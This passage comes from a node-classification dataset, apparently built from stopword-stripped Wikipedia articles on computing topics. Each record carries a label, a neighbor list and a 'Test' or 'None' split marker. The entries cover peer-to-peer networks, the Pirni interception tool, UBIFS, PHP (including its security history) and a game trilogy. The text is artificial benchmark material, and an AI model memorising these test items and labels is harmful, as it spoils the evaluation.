prove defendant infringed copyright willingly purpose personal financial gain commercial advantage fair use exceptions allow limited use copyrighted material downloaded without acquiring permission rights holders documents usually news reporting lines research scholarly work controversies developed concern illegitimate use peer-to-peer networks regarding public safety national security file downloaded peer-to-peer network impossible know created file users connected network given time trustworthiness sources potential security threat seen peer-to-peer systems study ordered european union found illegal downloading may lead increase overall video game sales newer games charge extra features levels paper concluded piracy negative financial impact movies music literature study relied self-reported data game purchases use illegal download sites pains taken remove effects false misremembered responses peer-to-peer applications present one core issues network neutrality controversy internet service providers isps known throttle p2p file-sharing traffic due high-bandwidth usage compared web browsing e-mail many uses internet data transferred short intervals relative small quantities p2p file-sharing often consists relatively heavy bandwidth usage due ongoing file transfers swarm/network coordination packets october 2007 comcast one largest broadband internet providers united states started blocking p2p applications bittorrent rationale p2p mostly used share illegal content infrastructure designed continuous high-bandwidth traffic critics point p2p networking legitimate legal uses another way large providers trying control use content internet direct people towards client-server-based application architecture client-server model provides financial barriers-to-entry small publishers individuals less efficient sharing large files reaction bandwidth throttling several p2p applications started implementing protocol obfuscation bittorrent protocol encryption techniques achieving protocol obfuscation involves removing otherwise easily identifiable properties protocols deterministic byte sequences packet sizes making data look random isp solution high bandwidth p2p caching isp stores part files accessed p2p clients order save access internet researchers used computer simulations aid understanding evaluating complex behaviors individuals within network networking research often relies simulation order test evaluate new ideas important requirement process results must reproducible researchers replicate validate extend existing work research reproduced opportunity research hindered even though new simulators continue released research community tends towards handful open-source simulators demand features simulators shown criteria survey high therefore community work together get features open-source software would reduce need custom simulators hence increase repeatability reputability experiments besides stated facts work done ns-2 open source network simulator one research issue related free rider detection punishment explored using ns-2 simulator",
    "neighbors": [
      2050,
      10242,
      4100,
      5636,
      7175,
      9225,
      522,
      1036,
      14,
      1558,
      9240,
      10270,
      8736,
      545,
      9248,
      2083,
      9762,
      4133,
      9764,
      10792,
      3625,
      9769,
      3629,
      2609,
      1074,
      5173,
      10807,
      9273,
      1087,
      6719,
      9281,
      4165,
      7238,
      8777,
      1098,
      82,
      1618,
      8789,
      3158,
      7256,
      8283,
      3676,
      609,
      4193,
      4194,
      10850,
      2661,
      9318,
      10341,
      10344,
      7276,
      8301,
      7794,
      9332,
      5749,
      119,
      7802,
      2687,
      4224,
      7807,
      8833,
      5251,
      10368,
      4229,
      5254,
      10879,
      4746,
      8331,
      3724,
      8845,
      1166,
      1172,
      11418,
      1692,
      10405,
      1195,
      4268,
      2222,
      10417,
      7859,
      2228,
      9909,
      4280,
      3770,
      6331,
      3777,
      708,
      3781,
      7364,
      8391,
      10438,
      6351,
      3792,
      3793,
      3286,
      8406,
      728,
      6364,
      5344,
      3812,
      3813,
      10469,
      9451,
      9965,
      238,
      7921,
      9971,
      5364,
      1274,
      251,
      3838,
      5887,
      3843,
      4356,
      5382,
      2314,
      5899,
      2829,
      5391,
      1297,
      1810,
      6421,
      3350,
      11029,
      10522,
      3867,
      11554,
      2339,
      9509,
      3366,
      11055,
      6964,
      3382,
      5438,
      6462,
      1858,
      5956,
      11077,
      333,
      6991,
      11088,
      337,
      6993,
      5972,
      1368,
      4952,
      2395,
      7515,
      11612,
      3422,
      8032,
      11105,
      11616,
      3428,
      5476,
      2409,
      11116,
      7537,
      1908,
      3959,
      6519,
      2432,
      6019,
      3462,
      6534,
      904,
      10631,
      4490,
      9098,
      3473,
      9619,
      9620,
      3990,
      5531,
      9117,
      9630,
      5026,
      10154,
      1456,
      945,
      10161,
      437,
      8630,
      1978,
      1979,
      8122,
      10686,
      3007,
      9664,
      4546,
      3011,
      6600,
      6602,
      8652,
      2511,
      4052,
      7639,
      3032,
      2011,
      5085,
      7139,
      10726,
      7656,
      8681,
      8170,
      9193,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 8641,
    "label": 4,
    "text": "Pirni:pirni pirni pro network security tool designed ios specifically iphone ipod touch devices capable intercepting traffic wireless network segment capturing passwords regular expressions entered user core system pirni written c open-source software licensed gnu general public license pirni pro succeeding version pirni commercial software available cydia store jailbroken apple devices pirni pro supports active dissection non-ciphered protocols given user supplied regular expression dissection application description contains following addition software also offers following features",
    "neighbors": [
      1346,
      9732,
      10470,
      4797,
      6345,
      6013,
      7983,
      2045,
      4957,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 8642,
    "label": 2,
    "text": "SMSQ/E:smsq/e smsq/e computer operating system originally developed france tony tebby designer original qdos operating system sinclair ql personal computer began life smsq qdos-compatible version sms2 intended miracle systems qxl emulator card pcs later developed extended version smsq/e atari st consists qdos compatible sms kernel rewritten superbasic interpreter called sbasic complete set superbasic procedures functions set extended device drivers originally written ql emulator atari st also integrates many extensions previously available separately ql like toolkit ii quite essential superbasic add-on pointer environment ql mouse windowing system hotkey system 2 smsq/e run unmodified ql runs advanced ql compatible platforms miracle systems super goldcard cpu plug-in cards q60 motherboard late 1995 german author marcel kilgus acquired smsq/e sources adaptation ql emulator qpc emulate specific ql hardware anymore employed specially adapted device drivers achieve tighter integration faster emulation 2000 version 2.94 first ql operating system broke free bounds ql 8 colour screen introducing gd2 graphic device interface version 2 ql compatible 16-bit high colour graphics sub-system version 2.99 system exclusively developed tony tebby marcel kilgus 2002 mr tebby released source code n't include qpc specific parts albeit license open source open source definition step tony tebby finally left ql scene development volunteers continues day early 2013 current source code re-released bsd license currently smsq/e consists approximately 2000 68k assembler source files containing 222,000 lines code",
    "neighbors": [
      10666,
      11204,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 8643,
    "label": 6,
    "text": "UBIFS:ubifs ubifs ubi file system fully unsorted block image file system flash file system unmanaged flash memory devices ubifs works top ubi unsorted block image layer top memory technology device mtd layer file system developed nokia engineers help university szeged hungary development began earnest 2007 first stable release made linux kernel 2.6.27 october 2008 two major differences ubifs jffs2 ubifs supports write caching ubifs errs pessimistic side free space calculation ubifs tends perform better jffs2 large nand flash devices consequence ubifs design goals faster mounting quicker access large files improved write speeds ubifs also preserves improves upon jffs2 on-the-fly compression recoverability power fail tolerance ubifs on-the-fly data compression allows zlib deflate algorithm lzo zstandard ubifs stores indexes flash whereas jffs2 stores filesystem indexes memory directly impacts scalability jffs2 tables must rebuilt every time volume mounted also jffs2 tables may consume enough system ram images may unusable ubi unsorted block images erase block management layer flash memory devices ubi serves two purposes tracking nand flash bad blocks providing wear leveling wear leveling spreads erases writes across entire flash device ubi presents logical erase blocks higher layers maps physical erase blocks ubi written specifically ubifs ubifs deal wear leveling bad blocks however ubi may also useful squashfs nand flash squashfs aware nand flash bad blocks ubi documentation explains complete flash translation layer ftl although ftl also handles bad blocks wear leveling interface ftl provides block device small typically 512 byte sectors written completely independently contrast ubi interface directly exposes erase blocks programmable pages different sizes much larger typical block device sectors filesystems use ubi must aware sizes restrictions blocks must erased written ubi augmented linux 3.7 fastmap support fastmap maintains on-disk version information previously created memory scanning entire flash device code falls back previous mechanism full scan failures older ubi systems simply ignore fastmap information",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      5661,
      9249,
      9762,
      5158,
      7225,
      11323,
      8772,
      1109,
      4708,
      9836,
      7789,
      9333,
      6263,
      9335,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      10951,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      3300,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      2314,
      8461,
      6416,
      1810,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      7983,
      6961,
      6963,
      1844,
      823,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      346,
      2395,
      2397,
      10596,
      2407,
      10087,
      11638,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      8114,
      7603,
      8631,
      1464,
      1978,
      7126,
      2015,
      1509,
      9189,
      7663,
      11256,
      2555,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 8644,
    "label": 9,
    "text": "PHP:php php hypertext preprocessor simply php general-purpose programming language originally designed web development originally created rasmus lerdorf 1994 php reference implementation produced php group php originally stood personal home page stands recursive initialism php hypertext preprocessor php code may executed command line interface cli embedded html code used combination various web template systems web content management systems web frameworks php code usually processed php interpreter implemented module web server common gateway interface cgi executable web server outputs results interpreted executed php code may type data generated html code binary image data php used many programming tasks outside web context standalone graphical applications robotic drone control standard php interpreter powered zend engine free software released php license php widely ported deployed web servers almost every operating system platform free charge php language evolved without written formal specification standard 2014 original implementation acting de facto standard implementations aimed follow since 2014 work gone create formal php specification majority sites web using php still version 5.6 older versions prior 7.1 longer officially supported php development team security support provided longer third parties debian php development began 1994 rasmus lerdorf wrote several common gateway interface cgi programs c used maintain personal homepage extended work web forms communicate databases called implementation personal home page/forms interpreter php/fi php/fi could used build simple dynamic web applications accelerate bug reporting improve code lerdorf initially announced release php/fi personal home page tools php tools version 1.0 usenet discussion group comp.infosystems.www.authoring.cgi june 8 1995 release already basic functionality php today included perl-like variables form handling ability embed html syntax resembled perl simpler limited less consistent early php intended new programming language grew organically lerdorf noting retrospect n't know stop never intent write programming language ... absolutely idea write programming language kept adding next logical step way development team began form months work beta testing officially released php/fi 2 november 1997 fact php originally designed instead developed organically led inconsistent naming functions inconsistent ordering parameters cases function names chosen match lower-level libraries php wrapping early versions php length function names used internally hash function names chosen improve distribution hash values zeev suraski andi gutmans rewrote parser 1997 formed base php 3 changing language name recursive acronym php hypertext preprocessor afterwards public testing php 3 began official launch came june 1998 suraski gutmans started new rewrite php core producing zend engine 1999 also founded zend technologies ramat gan israel may 22 2000 php 4 powered zend engine 1.0 released august 2008 branch reached version 4.4.9 php 4 longer development security updates released july 14 2004 php 5 released powered new zend engine ii php 5 included new features improved support object-oriented programming php data objects pdo extension defines lightweight consistent interface accessing databases numerous performance enhancements 2008 php 5 became stable version development late static binding missing php added version 5.3 many high-profile open-source projects ceased support php 4 new code february 5 2008 gophp5 initiative provided consortium php developers promoting transition php 4 php 5 time php interpreters became available existing 32-bit 64-bit operating systems either building php source code using pre-built binaries php versions 5.3 5.4 available microsoft windows binary distributions 32-bit ia-32 builds requiring windows 32-bit compatibility mode using internet information services iis 64-bit windows platform php version 5.5 made 64-bit x86-64 builds available microsoft windows official security support php 5.6 ended 31 december 2018 debian 8.0 jessie extend support june 2020 php received mixed reviews due lacking native unicode support core language level 2005 project headed andrei zmievski initiated bring native unicode support throughout php embedding international components unicode icu library representing text strings utf-16 internally since would cause major changes internals language user code planned release version 6.0 language along major features development however shortage developers understood necessary changes performance problems arising conversion utf-16 rarely used web context led delays project result php 5.3 release created 2009 many non-unicode features back-ported php 6 notably namespaces march 2010 project current form officially abandoned php 5.4 release prepared containing remaining non-unicode features php 6 traits closure re-binding initial hopes new plan would formed unicode integration none adopted 2014 2015 new major php version developed numbered php 7 numbering version involved debate php 6 unicode experiment never released several articles book titles referenced php 6 name might caused confusion new release reuse name vote name php 7 chosen foundation php 7 php branch originally dubbed php next generation phpng authored dmitry stogov xinchen hui nikita popov aimed optimize php performance refactoring zend engine retaining near-complete language compatibility wordpress-based benchmarks served main benchmark suite phpng project showed almost 100 increase performance changes phpng also expected make easier improve performance future compact data structures changes seen better suited successful migration just-in-time jit compiler significant changes reworked zend engine called zend engine 3 succeeding zend engine 2 used php 5 major internal changes phpng must receive new major version number php rather minor php 5 release according php release process major versions php allowed break backward-compatibility code therefore php 7 presented opportunity improvements beyond phpng require backward-compatibility breaks particular involved following changes php 7 also included new language features notably introduces return type declarations functions complement existing parameter type declarations support scalar types integer float string boolean parameter return type declarations beginning june 28 2011 php development team implemented timeline release new versions php system least one release occur every month per year minor release occur may include new features every minor release least supported two years security bug fixes followed least one year security fixes total three-year release process every minor release new features unless small self-contained introduced minor release three-year release process mascot php project elephpant blue elephant php logo side designed vincent pontier 1998 php letters forming shape elephant viewed sideways angle elephpant sometimes differently colored plush toy form many variations mascot made years elephpants based original design vincent pontier considered official community highly collectible extremely rare different variations listed field guide elephpants following hello world program written php code embedded html document doctype html title php hello world program /title php echo p hello world /p however requirement exists php code embedded html simplest version hello world may written like closing tag omitted preferred files containing pure php code well requirement php file contain php code interpreter output data outside php tags unchanged simple text file containing codice_13 give output php interpreter executes php code within delimiters anything outside delimiters processed php although non-php text still subject control structures described php code common delimiters php open close php sections shortened form also exists short delimiter makes script files less portable since support disabled local php configuration therefore discouraged recommendation echo short tag prior php 5.4.0 short syntax echo works codice_14 configuration setting enabled php 5.4.0 later always available purpose delimiters separate php code non-php content javascript code html markup first form delimiters php xhtml xml documents creates correctly formed xml processing instructions means resulting mixture php code markup server-side file well-formed xml variables prefixed dollar symbol type need specified advance php 5 introduced type hinting allows functions force parameters objects specific class arrays interfaces callback functions however php 7.0 type hints could used scalar types integer string unlike function class names variable names case sensitive double-quoted heredoc strings provide ability interpolate variable value string php treats newlines whitespace manner free-form language statements terminated semicolon php three types comment syntax /* */ marks block inline comments // used one-line comments codice_15 statement one several facilities php provides output text terms keywords language syntax php similar c style syntax conditions loops function returns similar syntax languages c c++ c java perl php stores integers platform-dependent range either 64-bit 32-bit 128-bit signed integer equivalent c-language long type unsigned integers converted signed values certain situations behavior different programming languages integer variables assigned using decimal positive negative octal hexadecimal binary notations floating point numbers also stored platform-specific range specified using floating point notation two forms scientific notation php native boolean type similar native boolean types java c++ using boolean type conversion rules non-zero values interpreted true zero false perl c++ null data type represents variable value codice_16 allowed value data type old versions interpreter allowed multiple copies value exist variables resource type represent references resources external sources typically created functions particular extension processed functions extension examples include file image database resources arrays contain elements type php handle including resources objects even arrays order preserved lists values hashes keys values two intermingled php also supports strings used single quotes double quotes nowdoc heredoc syntax standard php library spl attempts solve standard problems implements efficient data access interfaces classes php defines large array functions core language many also available various extensions functions well documented online php documentation however built-in library wide variety naming conventions associated inconsistencies described history custom functions may defined developer function myage int birthyear string echo currently myage 1995 old 2019 output sample program currently 24 years old lieu function pointers functions php referenced string containing name manner normal php functions used example callbacks within function tables user-defined functions may created time without prototyped functions may defined inside code blocks permitting run-time decision whether function defined codice_17 function determines whether function given name already defined function calls must use parentheses exception zero-argument class constructor functions called php operator codice_18 case parentheses optional php 5.3 support anonymous functions closures exist php codice_19 exists since php 4.0.1 merely thin wrapper around codice_20 allows normal php functions created program execution php 5.3 added syntax define anonymous function closure capture variables surrounding scope function getadder x adder getadder 8 echo adder 2 // prints 10 example codice_21 function creates closure using passed argument keyword codice_22 imports variable lexical context takes additional argument returns created closure caller function first-class object meaning stored variable passed parameter functions etc unusually dynamically typed language php supports type declarations function parameters enforced runtime supported classes interfaces since php 5.0 arrays since php 5.1 callables since php 5.4 scalar integer float string boolean types since php 7.0 php 7.0 also type declarations function return types expressed placing type name list parameters preceded colon example codice_23 function earlier example could annotated types like php 7 function getadder int x closure adder getadder 8 echo adder 2 // prints 10 echo adder null // throws exception incorrect type passed adder getadder // would also throw exception default scalar type declarations follow weak typing principles example parameter type codice_24 php would allow integers also convertible numeric strings floats booleans passed function would convert however php 7 strict typing mode used disallows conversions function calls returns within file basic object-oriented programming functionality added php 3 improved php 4 allowed php gain abstraction making creative tasks easier programmers using language object handling completely rewritten php 5 expanding feature set enhancing performance previous versions php objects handled like value types drawback method code make heavy use php reference variables wanted modify object passed rather creating copy new approach objects referenced handle value php 5 introduced private protected member variables methods along abstract classes final classes abstract methods final methods also introduced standard way declaring constructors destructors similar object-oriented languages c++ standard exception handling model furthermore php 5 added interfaces allowed multiple interfaces implemented special interfaces allow objects interact runtime system objects implementing arrayaccess used array syntax objects implementing iterator iteratoraggregate used codice_6 language construct virtual table feature engine static variables bound name instead reference compile time developer creates copy object using reserved word codice_26 zend engine check whether codice_27 method defined call default codice_27 copy object properties codice_27 method defined responsible setting necessary properties created object convenience engine supply function imports properties source object programmer start by-value replica source object override properties need changed following basic example object-oriented programming php php abstract class user class student extends user class teacher extends user students teachers echo students \\n foreach students student echo teachers \\n foreach teachers teacher // output program // students // hello name alice learn computer science // hello name bob learn computer science // hello name charlie learn business studies // teachers // hello name dan teach computer science information security // hello name erin teach computer science 3d graphics programming // hello name frankie teach online marketing business studies e-commerce visibility php properties methods defined using keywords codice_30 codice_31 codice_32 default public var used codice_33 synonym codice_30 items declared codice_30 accessed everywhere codice_32 limits access inherited classes class defines item codice_31 limits visibility class defines item objects type access private protected members even though instance original complete widely used php implementation powered zend engine known simply php disambiguate implementations sometimes unofficially called zend php zend engine compiles php source code on-the-fly internal format execute thus works interpreter also reference implementation php php formal specification semantics zend php define semantics php due complex nuanced semantics php defined zend works difficult competing implementations offer complete compatibility php single-request-per-script-execution model fact zend engine interpreter leads inefficiency result various products developed help improve php performance order speed execution time compile php source code every time web page accessed php scripts also deployed php engine internal format using opcode cache works caching compiled form php script opcodes shared memory avoid overhead parsing compiling code every time script runs opcode cache zend opcache built php since version 5.5 another example widely used opcode cache alternative php cache apc available pecl extension zend php still popular implementation several implementations developed compilers support jit compilation hence offer performance benefits zend php expense lacking full php compatibility alternative implementations include following php free software released php license stipulates restriction use php makes php license incompatible general public license gpl zend license incompatible due advertising clause similar original bsd license php includes various free open-source libraries source distribution uses resulting php binary builds php fundamentally internet-aware system built-in modules accessing file transfer protocol ftp servers many database servers including postgresql mysql microsoft sql server sqlite embedded database ldap servers others numerous functions familiar c programmers stdio family available standard php builds php allows developers write extensions c add functionality php language php extensions compiled statically php loaded dynamically runtime numerous extensions written add support windows api process management unix-like operating systems multibyte strings unicode curl several popular compression formats php features made available extensions include integration irc dynamic generation images adobe flash content php data objects pdo abstraction layer used accessing databases even speech synthesis language core functions dealing strings arrays also implemented extensions php extension community library pecl project repository extensions php language projects zephir provide ability php extensions created high-level language compiled native php extensions approach instead writing php extensions directly c simplifies development extensions reduces time required programming testing php group consisted ten people thies c. arntzen stig bakken shane caraveo andi gutmans rasmus lerdorf sam ruby sascha schumann zeev suraski jim winstead andrei zmievski zend technologies provides php certification based php 5.5 exam programmers become certified php developers two primary ways adding support php web server – native web server module cgi executable php direct module interface called server application programming interface sapi supported many web servers including apache http server microsoft iis netscape defunct iplanet web servers omnihttpd support internet server application programming interface isapi microsoft web server module interface php module support web server always used common gateway interface cgi fastcgi processor case web server configured use php cgi executable process requests php files php-fpm fastcgi process manager alternative fastcgi implementation php bundled official php distribution since version 5.3.3 compared older fastcgi implementation contains additional features mostly useful heavily loaded web servers using php command-line scripting php command-line interface cli executable needed php supports cli server application programming interface sapi php 4.3.0 main focus sapi developing shell applications using php quite differences cli sapi sapis although share many behaviors php direct module interface called sapi different web servers case php 5 apache 2.0 windows provided form dll file called module among functions provides interface php web server implemented form server understands form known sapi different kinds sapis various web server extensions example addition listed sapis php language include common gateway interface cgi command-line interface cli php also used writing desktop graphical user interface gui applications using php-gtk extension php-gtk included official php distribution extension used php versions 5.1.0 newer common way installing php-gtk compiling source code php installed used cloud environments software development kits sdks provided using cloud-specific features example numerous configuration options supported affecting core php features extensions configuration file codice_40 searched different locations depending way php used configuration file split various sections configuration options also set within web server configuration php general-purpose scripting language especially suited server-side web development case php generally runs web server php code requested file executed php runtime usually create dynamic web page content dynamic images used websites elsewhere also used command-line scripting client-side graphical user interface gui applications php deployed web servers many operating systems platforms used many relational database management systems rdbms web hosting providers support php use clients available free charge php group provides complete source code users build customize extend use originally designed create dynamic web pages php focuses mainly server-side scripting similar server-side scripting languages provide dynamic content web server client microsoft asp.net sun microsystems javaserver pages codice_41 php also attracted development many software frameworks provide building blocks design structure promote rapid application development rad include prado cakephp symfony codeigniter laravel yii framework phalcon zend framework offering features similar web frameworks lamp architecture become popular web industry way deploying web applications php commonly used p bundle alongside linux apache mysql although p may also refer python perl mix three similar packages wamp mamp also available windows macos first letter standing respective operating system although php apache provided part macos base install users packages seek simpler installation mechanism easily kept date 20 million internet domains web services hosted servers php installed codice_42 recorded popular apache http server module php used server-side programming language 79.1 websites 83.5 previously language could determined web content management systems written php include mediawiki joomla ez publish ez platform silverstripe wordpress drupal moodle websites written php back-end and/or user-facing portion include facebook digg tumblr dailymotion slack specific advanced usage scenarios php offers well defined documented way writing custom extensions c c++ besides extending language form additional libraries extensions providing way improving execution speed critical room improvements using true compiled language php also offers well defined ways embedding software projects way php easily used internal scripting language another project also providing tight interfacing project specific internal data structures php received mixed reviews due lacking support multithreading core language level though using threads made possible pthreads pecl extension php used 240 million websites 39 sampled installed 2.1 million web servers command line interface php-cli two activex windows script host scripting engines php produced php 5 used web last updated security updates january 2019 php 5.6.40 2017 3 vulnerabilities listed national vulnerability database linked php historically 30 vulnerabilities listed since 1996 database linked php technical security flaws language core libraries frequent 22 2009 1 total although php applies 20 programs listed recognizing programmers make mistakes languages include taint checking automatically detect lack input validation induces many issues feature developed php inclusion release rejected several times past advanced protection patches suhosin hardening-patch especially designed web hosting environments historically old versions php configuration parameters default values runtime settings made php applications prone security issues among codice_43 codice_44 configuration directives best known latter made url parameters become php variables opening path serious security vulnerabilities allowing attacker set value uninitialized global variable interfere execution php script support magic quotes register globals settings deprecated php 5.3.0 removed php 5.4.0 another example potential runtime-settings vulnerability comes failing disable php execution example using codice_45 configuration directive directory uploaded files stored enabling result execution malicious code embedded within uploaded files best practice either locate image directory outside document root available web server serve via intermediary script disable php execution directory stores uploaded files also enabling dynamic loading php extensions via codice_46 configuration directive shared web hosting environment lead security issues implied type conversions result different values treated equal sometimes programmer intent lead security issues example result comparison codice_47 first compared value treated scientific notation value zero errors like resulted authentication vulnerabilities simple machines forum typo3 phpbb md5 password hashes compared recommended way use hash_equals timing attack safety codice_48 identity operator codice_49 results codice_50 2013 analysis 170,000 website defacements published zone-h frequently 53 used technique exploitation file inclusion vulnerability mostly related insecure usage php functions codice_51 codice_52 codice_53",
    "neighbors": [
      2048,
      6154,
      2064,
      4113,
      6160,
      8213,
      10262,
      10266,
      8221,
      6176,
      6177,
      8236,
      10284,
      46,
      8262,
      4171,
      6219,
      8273,
      84,
      6228,
      4194,
      10340,
      102,
      4200,
      8303,
      8304,
      113,
      119,
      124,
      6269,
      2181,
      10374,
      6285,
      10387,
      148,
      155,
      4255,
      8354,
      2217,
      2220,
      4284,
      190,
      6335,
      8385,
      6338,
      8408,
      6361,
      6366,
      225,
      8419,
      228,
      10470,
      231,
      2281,
      234,
      10474,
      10478,
      6385,
      254,
      6398,
      2304,
      263,
      10506,
      10511,
      8473,
      8476,
      10526,
      2339,
      2348,
      303,
      8495,
      6458,
      2364,
      6465,
      2372,
      10565,
      8520,
      8524,
      333,
      335,
      337,
      4439,
      10586,
      8539,
      10587,
      6493,
      2400,
      2401,
      8549,
      6502,
      362,
      8554,
      8559,
      372,
      6523,
      4485,
      6533,
      8582,
      4490,
      8587,
      6555,
      412,
      10654,
      2465,
      8609,
      8618,
      428,
      6576,
      2481,
      4529,
      2485,
      4550,
      10701,
      463,
      10703,
      467,
      2519,
      477,
      479,
      10736,
      8689,
      8691,
      502,
      6651,
      2556,
      2557,
      522,
      2576,
      2585,
      546,
      8739,
      2603,
      8749,
      10798,
      4658,
      6714,
      574,
      575,
      6718,
      8771,
      10819,
      8775,
      8781,
      595,
      10841,
      10851,
      6756,
      10854,
      4725,
      6797,
      655,
      10900,
      8863,
      2727,
      4775,
      4777,
      10921,
      6828,
      8883,
      692,
      10939,
      4797,
      2758,
      711,
      8909,
      10959,
      8915,
      4822,
      6875,
      10971,
      741,
      747,
      2795,
      10991,
      10994,
      2804,
      4853,
      6910,
      8965,
      11017,
      788,
      2836,
      11030,
      6941,
      8990,
      11038,
      8994,
      2864,
      820,
      823,
      4919,
      4927,
      2880,
      847,
      2901,
      2903,
      11098,
      4956,
      863,
      865,
      11105,
      9063,
      7022,
      11120,
      4980,
      888,
      9090,
      899,
      4997,
      9097,
      908,
      11154,
      5012,
      11161,
      7076,
      7078,
      9128,
      11188,
      5048,
      963,
      3012,
      5059,
      5067,
      11213,
      11219,
      11221,
      9177,
      5093,
      7144,
      7147,
      9202,
      1016,
      11259,
      5120,
      3076,
      11268,
      1034,
      5131,
      9229,
      5139,
      11284,
      3099,
      9245,
      7210,
      7212,
      1069,
      11309,
      3120,
      11317,
      1101,
      5198,
      7248,
      7256,
      5209,
      11357,
      9320,
      1130,
      7274,
      11371,
      7277,
      3182,
      1135,
      9330,
      7292,
      7293,
      1152,
      9345,
      5251,
      5255,
      11403,
      9360,
      7326,
      1185,
      1203,
      7347,
      7355,
      1211,
      1215,
      5314,
      7364,
      7370,
      11466,
      7373,
      1244,
      5356,
      5357,
      9455,
      11506,
      5367,
      1277,
      5380,
      5383,
      9487,
      9490,
      5395,
      9491,
      5397,
      3350,
      5399,
      9495,
      11552,
      9519,
      9527,
      1347,
      1348,
      1353,
      9557,
      1379,
      3428,
      1381,
      7523,
      11625,
      7530,
      9579,
      9580,
      9584,
      7539,
      5500,
      3462,
      3466,
      9614,
      5521,
      5524,
      1429,
      9625,
      11674,
      1435,
      9631,
      11688,
      5546,
      5549,
      11693,
      1468,
      9665,
      9666,
      9671,
      3533,
      7629,
      5585,
      5588,
      5593,
      3553,
      9701,
      7658,
      5612,
      9714,
      7669,
      3582,
      9726,
      1546,
      9738,
      1556,
      5660,
      3613,
      5666,
      5677,
      1583,
      5682,
      5684,
      9780,
      1591,
      1594,
      3642,
      1605,
      9808,
      3667,
      9828,
      7784,
      7785,
      5738,
      7787,
      9834,
      1646,
      5743,
      9841,
      9844,
      9847,
      9848,
      3705,
      5754,
      1666,
      7812,
      5768,
      1673,
      5783,
      5784,
      5788,
      5806,
      1723,
      5819,
      7871,
      5827,
      5833,
      5841,
      7889,
      7894,
      5849,
      5874,
      1802,
      1803,
      5900,
      1812,
      1813,
      1817,
      3867,
      10011,
      5917,
      7965,
      3876,
      10020,
      5929,
      10026,
      5934,
      7982,
      7983,
      10033,
      7987,
      5945,
      10043,
      5961,
      3918,
      3920,
      10075,
      3956,
      3960,
      8057,
      1920,
      3969,
      6016,
      8068,
      1935,
      3986,
      8082,
      8084,
      1943,
      10143,
      1952,
      4010,
      6074,
      8132,
      8133,
      10186,
      8147,
      4053,
      4056,
      4057,
      2010,
      4069,
      6119,
      6137,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 8645,
    "label": 4,
    "text": "IDEX_Biometrics:idex biometrics idex biometrics asa norwegian biometrics company specialising fingerprint imaging fingerprint recognition technology company founded 1996 headquartered oslo 2013 idex opened two u.s.-based offices one silicon valley california another boston massachusetts idex offers fingerprint sensor biometric software identity cards banking cards smart cards access control healthcare iot security solutions fingerprint recognition one form biometric identification examples dna face recognition iris recognition retinal scan well identification based behavioral patterns speaker recognition keystroke dynamics signature recognition idex smartfinger film sensor technology based polymer process technologies offers small ultra-thin flexible swipe fingerprint sensors idex holds early patents low-cost capacitive fingerprint sensors cross-licence apple relating technology idex demonstrated mobile phone-related technology implementations running android platform well technology concept finger print sensors built cover glass mobile phones finger recognition solutions apple iphone ipad using smartfinger launched idex technology also integrated biometric iso-compliant cards 2013 idex added touch sensors planned product portfolio addition swipe sensors november company specified plans deliver product samples touch sensors mid 2014 since idex announcement partnership safran identity security morpho november 2016 commercialize first mass deployable biometric smart cards ot oberthur technologies safran morpho business came together become idemia november 2017 idex announced continued development innovative end-to-end biometric system solutions payment cards idemia. https //globenewswire.com/news-release/2017/11/24/1205671/0/en/idex-expands-partnership-with-idemia-to-advance-biometric-contactless-card-solutions.html idex partnerships global companies including mastercard idemia chutian dragon feitian goldpac hed hengbao excelsecu infineon xh smart tech idex received 2009 frost sullivan global swipe sensor product differentiation innovation year award idex awarded sesame award smartfinger film fingerprint sensor technology 2010 sesames awards ceremony paris france cartes 2012 north america idex displayed latest demonstration products embedding smartfinger technology well smartfinger secure processor software new smartfinger evaluation kit",
    "neighbors": [
      2737,
      6539,
      9745,
      10207
    ],
    "mask": "None"
  },
  {
    "node_id": 8646,
    "label": 3,
    "text": "Silicon_Dreams:silicon dreams silicon dreams trilogy interactive fiction games developed level 9 computing 1980s first game snowball released 1983 followed year later return eden worm paradise 1985 next year vended together first second last silicon dreams early advertisements gave title silicon dream pluralised later level 9 games trilogy used interpreted language termed a-code usable major types home computer time either diskette cassette level 9 self-published game separately compilation published telecomsoft sold united states tradename firebird europe tradename rainbird trilogy set too-distant future humans started colonising space first two instalments player role kim kimberly undercover agent whose goal snowball save colonist spacecraft crashing star return eden stop defence system destination planet eden destroying craft worm paradise player role unnamed citizen eden must travel around city enoch learn secrets earn money save planet games use text parser entering commands prompt parser interpret thousand words control movement actions looks command picking two three words knows ignoring order tries guess meant movement usual commands moving 'north 'south 'east 'west available abbreviated forms n e w well 'up 'down u 'd respectively number directions 'modes movement like 'jump actions understands pick objects opening doors lighting lamps well dropping objects wielding additionally commands invoke 'save 'restore game positions cassette tape floppy disk systems also ram ask 'help turn pictures turn 'words 'pictures respectively 'oops command undo previous commands silicon dreams played three separate games obtain maximum score games must completed order carrying score one adventure next points scored collecting treasures rather specific tasks helping satisfy goal individual game snowball goal get main control room prevent starship snowball 9 crashing star return eden goal get city enoch stop robots destroying snowball 9 worm paradise goal find much information city possible obtain money become member governing party eden saving planet process trilogy set future human race colonizing stars transport network developed entire solar system using accelerator chains big 5 nations earth initiated plan colonise galaxy known terran expansionary phase lasted ninety years 2120 2210 first major activity launch probes outer space probes reported earth-sized planet encountered centuries-long voyage probe followed survey ship ten years later ship mission map planet habitable would signal earth waiting colonists arrive terraform planet second part phase survey ship mined materials asteroids used build robot factory space — process could take decades resulting robots built space factories turn produced better robots also built large satellite dishes collect data sent earth containing latest technological advances terraforming performed robots landed planet built 